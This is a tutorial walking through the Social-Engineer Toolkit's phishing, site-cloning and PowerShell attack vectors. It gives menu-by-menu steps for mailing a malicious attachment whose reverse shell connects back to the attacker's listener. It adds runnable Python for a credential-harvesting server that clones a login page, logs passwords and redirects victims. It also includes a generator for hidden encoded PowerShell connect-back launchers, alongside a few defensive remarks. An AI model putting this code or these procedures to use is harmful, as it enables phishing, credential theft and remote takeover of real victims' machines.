SET (Social-Engineer Toolkit)
An open-source social-engineering toolkit, usually used together with Metasploit, which supplies the exploits and payloads SET wraps.
GitHub: https://github.com/trustedsec/ptf (PTF, the PenTesters Framework, which installs and updates SET along with other tools; SET itself lives at https://github.com/trustedsec/social-engineer-toolkit)
On Kali, start it with
setoolkit
From the main menu select item 1, Social-Engineering Attacks.
1. Spear-Phishing Attack Vectors
Choose option 1, the spear-phishing attack:
set> 1
The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is installed
(apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to
SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>
The three options are: a mass-mailing attack, creating a file-format payload (the malicious attachment), and creating a social-engineering email template.
Choose the second option first, to build the attachment:
set:phishing>2
/usr/share/metasploit-framework/
Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>
Choose option 3 (MS15-100, a malicious Windows Media Center .mcl file). SET then asks which payload to embed, i.e. how the resulting shell connects back:
set:payloads>3
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
Choose option 4, the Windows x64 reverse TCP command shell:
set:payloads>4
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
SET asks for the listener address (LHOST) and port. LHOST must be reachable from the victim: against Internet targets this is your public IP or a port-forwarded address, whereas here it is just the lab IP of the Kali machine. Port 443 is the default because outbound HTTPS is rarely blocked by egress filtering.
After a short wait the payload is ready. SET then offers two choices: keep the current filename, or rename it.
Choose the second and give the file a name:
set:phishing>2
set:phishing> New filename:helloword.pdf
Next, choose between sending a single email and mass mailing; choose option 1 (single email):
set:phishing>1
Then choose the template: 1. a pre-defined template, 2. a one-time-use email template.
Choose the second:
set:phishing>2
SET now asks for a subject, whether the body is HTML or plain text (choose p), and then the body line by line. The body is only filler here (the original used Li Bai's poem 将进酒, given below in translation); any text will do.
set:phishing> Subject of the email:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: Do you not see the waters of the Yellow River come down from heaven, rushing to the sea never to return?
Next line of the body: Do you not see, in the bright mirror of the high hall, grief over white hair, black silk at dawn and snow by dusk?
Next line of the body: When life goes your way, enjoy it to the full; never let the golden cup stand empty before the moon.
Next line of the body: Heaven gave me talents that must find their use; a thousand gold pieces spent will come back again.
Next line of the body: Boil the lamb, slaughter the ox, and be merry; we must drink three hundred cups at one sitting.
Next line of the body: Master Cen, Danqiu, bring in the wine and let the cups not stop.
Next line of the body: I will sing you a song; lend me your ears.
Next line of the body: Bells, drums and jade-like dishes are not worth prizing; I only wish to stay drunk and never wake.
Next line of the body: The sages of old were all lonely; only the drinkers have left their names.
Next line of the body: The Prince of Chen once feasted at Pingle, ten thousand a cask, reveling without restraint.
Next line of the body: Why does the host say money is short? Just buy more wine and pour for you.
Next line of the body: The dappled horse, the thousand-gold furs: call the boy to trade them for fine wine, and with you I will drown the sorrow of ten thousand ages.
Next line of the body: ^C
Press Ctrl+C to finish the body, then enter the recipient address:
set:phishing> Send email to:<recipient address>
Next, set up the sending account. Option 1 is a Gmail account; option 2 is your own mail server or an open relay, which needs SMTP settings. Choose 1, enter the Gmail address and the FROM name the recipient will see, then follow the remaining prompts.
set:phishing>1
set:phishing> Your gmail email address:<your gmail address>
set:phishing> The FROM NAME user will see:
Note that Gmail no longer accepts plain username/password logins from third-party clients; you need an app password (with 2-Step Verification enabled) or your own SMTP server via option 2.
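As an added illustration, not SET's own code, of what the mailer above actually hands to sendmail: the visible From header is free-form text chosen by the attacker, the attachment is whatever bytes SET generated under a .pdf name, and the only thing tying the mail to its real origin is the SMTP envelope sender, which is why a receiving gateway compares the two (DMARC alignment). The addresses, subject and attachment bytes below are constructed, and nothing is sent; the message is built and parsed back.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Constructed stand-in for the lure: bytes that merely begin like a PDF.
FAKE_PDF = b"%PDF-1.4\n% constructed placeholder, not the payload SET generates\n"


def build_phish(display_from, to_addr, subject, body, filename, attachment):
    """Build the message SET's mailer would hand to sendmail.

    display_from is whatever the attacker types as the FROM name/address;
    the SMTP envelope sender (MAIL FROM) is supplied separately at send time,
    so the two need not agree.
    """
    msg = EmailMessage()
    msg["From"] = display_from
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content(body)                      # the plain-text ('p') body
    msg.add_attachment(attachment, maintype="application",
                       subtype="pdf", filename=filename)
    return msg.as_bytes()


def attachment_summary(raw):
    """Parse a raw message and list (filename, declared content type) per attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [(p.get_filename(), p.get_content_type()) for p in msg.iter_attachments()]


def sender_mismatch(raw, envelope_from):
    """True when the From header's domain differs from the envelope sender's.

    This is the comparison DMARC alignment makes: SPF may pass for the
    envelope domain the attacker controls while the visible From is spoofed.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    header_domain = parseaddr(str(msg["From"]))[1].rsplit("@", 1)[-1].lower()
    envelope_domain = parseaddr(envelope_from)[1].rsplit("@", 1)[-1].lower()
    return header_domain != envelope_domain


if __name__ == "__main__":
    raw = build_phish("IT Support <helpdesk@example.com>", "victim@example.com",
                      "Updated expense form", "Please review the attached form.",
                      "helloword.pdf", FAKE_PDF)
    print(attachment_summary(raw))
    print("spoofed From:", sender_mismatch(raw, "bounce@attacker.example.net"))
```

The declared content type is attacker-controlled too: a gateway that trusts `application/pdf` without sniffing the bytes will pass the MCL or embedded-EXE lure built above just as happily.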
2. Website Attack Vectors
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
Choose option 1, the Java Applet Attack Method:
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Choose option 2 (Site Cloner). SET then asks whether NAT/port forwarding is in use and for the listener address:
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.200.41]:
Next, choose how the applet is signed:
1. Make my own self-signed certificate applet.
2. Use the applet built in SET.
3. I have my own code signing certificate or applet
Choose 2 (the built-in applet is self-signed, so the victim has to click through Java's security warning before it runs), then enter the URL to clone:
set:webattack> Enter the url to clone:
After the URL, SET asks which payload (shell) the applet should deliver and then which listener to start; choose the first option in each case.
This attack frequently fails because it depends on the victim's browser running Java applets: the Java browser plugin has been dropped by current versions of Chrome, Firefox and Edge, and the applet API was removed from Java 11 onward, so it only works against an old browser with the plugin installed and a user who accepts the security prompt.
Next, the Credential Harvester Attack Method.
Choose 3 in the web-attack menu, then 2 (Site Cloner) and give it the login page to clone.
SET serves the cloned page from its own web server, rewrites the login form so the POST lands on SET, prints every field the user submits (username, password and anything else in the form), and then redirects the victim to the real site so that nothing looks wrong.
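As an added illustration of the mechanism just described (not SET's own code): a cloned page has its form action pointed at the harvester, the harvester decodes whatever the victim POSTs, and the victim is bounced to the genuine site with a 302. The page HTML, the harvester URL and the target site are constructed for the example; the server at the bottom only starts when the file is run directly.

```python
import re
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

HARVESTER_URL = "http://192.168.200.41/"     # assumption: where the rewritten form posts
REAL_SITE = "https://login.example.com/"     # assumption: where the victim is sent afterwards

# Constructed stand-in for the cloned login page.
CLONED_PAGE = """<html><body><h1>Sign in</h1>
<form method="post" action="https://login.example.com/session">
  <input name="username"><input name="password" type="password">
  <input type="submit" value="Sign in">
</form></body></html>"""


def rewrite_form_actions(html, harvester_url):
    """Point every <form> at the harvester; a form with no action gets one added."""
    def fix(match):
        tag = match.group(0)
        if re.search(r"\baction\s*=", tag, re.I):
            return re.sub(r"""\baction\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)""",
                          f'action="{harvester_url}"', tag, flags=re.I)
        return tag[:-1] + f' action="{harvester_url}">'
    return re.sub(r"<form\b[^>]*>", fix, html, flags=re.I)


class _Forms(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))


def form_actions(html):
    """List the action of every form, used to verify the rewrite took effect."""
    parser = _Forms()
    parser.feed(html)
    return parser.actions


def harvest(post_body):
    """Decode a form POST body into the captured fields (the table SET prints)."""
    return {k: v[0] for k, v in parse_qs(post_body, keep_blank_values=True).items()}


class Harvester(BaseHTTPRequestHandler):
    """GET serves the rewritten clone; POST logs the fields and redirects to the real site."""
    page = rewrite_form_actions(CLONED_PAGE, HARVESTER_URL).encode()

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(self.page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode(errors="replace")
        print("[*] captured from %s: %s" % (self.client_address[0], harvest(body)))
        self.send_response(302)              # victim lands on the genuine site
        self.send_header("Location", REAL_SITE)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Harvester).serve_forever()
```

The only visible difference for the victim is the address bar, which is why the defences that matter here are the ones a cloned page cannot copy: a password manager that refuses to fill on the wrong origin, and phishing-resistant MFA (FIDO2/WebAuthn) whose assertion is bound to the real site's origin.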
The Multi-Attack Web Method (option 6 in the web-attack menu) combines several of the methods above on a single cloned page: you pick which vectors to enable (Java applet, Metasploit browser exploit, credential harvester, tabnabbing and so on) and enter the same parameters as before.
Since it is just the previous methods run together, it is not demonstrated here.
3. Wireless Access Point Attack Vector
1. Needs a wireless card capable of access-point (monitor) mode
2. In a virtual machine the USB wireless adapter must be passed through to the guest
3. Relies on DNS spoofing: SET stands up a rogue access point and answers DNS queries from clients with its own address, so that any site they open is served by the web attack vectors above
4. QRCode Generator Attack Vector
This only generates a QR code for a URL you supply; the URL itself (a cloned page, a payload download, etc.) you have to build with the other vectors.
5. Powershell Attack Vectors
These use the PowerShell built into Windows.
Older Windows versions cannot run them: PowerShell ships with Windows 7 / Server 2008 R2 and later, and is absent on XP and Vista unless installed separately.
For the basics of PowerShell see
https://mp.weixin.qq.com/s/LR6OL_mARk6YBHcZAbKY3Q
Select item 9 from the Social-Engineering Attacks menu, enter the listener IP address and port, and SET generates the PowerShell script; answer yes to start the listener, then deliver the script to the target host.
Run the .ps1 file on the target host.
The listener on Kali receives the shell.
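An added example, written in Python rather than PowerShell to match the other examples on this page (it is not SET's code): SET's PowerShell vectors hand you a one-liner whose script is passed as `-EncodedCommand`, i.e. base64 over the UTF-16LE bytes of the script, and a defender reading a process-creation log reverses the same transform to see what a logged command line really does. The sample script (a single connect-back line aimed at the listener address used in this walkthrough) and the launcher flags are constructed for the example.

```python
import base64
import re

# Constructed sample: the first line of a connect-back script, pointing at the
# listener address used in this walkthrough. Not SET's generated payload.
SAMPLE_SCRIPT = "$c = New-Object System.Net.Sockets.TCPClient('192.168.200.41', 443)"

# Strings worth flagging once a command has been decoded.
INDICATORS = ("TCPClient", "IEX", "Invoke-Expression", "DownloadString",
              "FromBase64String", "Reflection.Assembly", "VirtualAlloc")


def encode_command(script):
    """PowerShell expects base64 over the UTF-16LE bytes of the script, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def make_launcher(script):
    """The one-liner pasted on the target (flags assumed; SET's vectors use similar ones)."""
    return ("powershell -NoP -NonI -W Hidden -Exec Bypass "
            "-EncodedCommand " + encode_command(script))


# -e, -ec, -enc and -encodedcommand are all accepted abbreviations.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_command_line(cmdline):
    """Recover the script from a logged command line, or None if it is not encoded."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None           # not valid base64 / not UTF-16LE: treat as not encoded


def indicators_in(script):
    """Case-insensitive hits from INDICATORS in a decoded script."""
    return [i for i in INDICATORS if i.lower() in script.lower()]


if __name__ == "__main__":
    launcher = make_launcher(SAMPLE_SCRIPT)
    print(launcher)
    decoded = decode_command_line(launcher)
    print("decoded :", decoded)
    print("flags   :", indicators_in(decoded))
```

Encoding hides the script from a casual look at the command line but not from Sysmon event 1 or Security event 4688 with command-line logging, and on a host with script block logging (event 4104) the decoded script is logged anyway; the `-enc` flag together with `-W Hidden` and `-Exec Bypass` is itself a common detection rule.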
The other attack vectors are not demonstrated here; try them yourself if you are interested.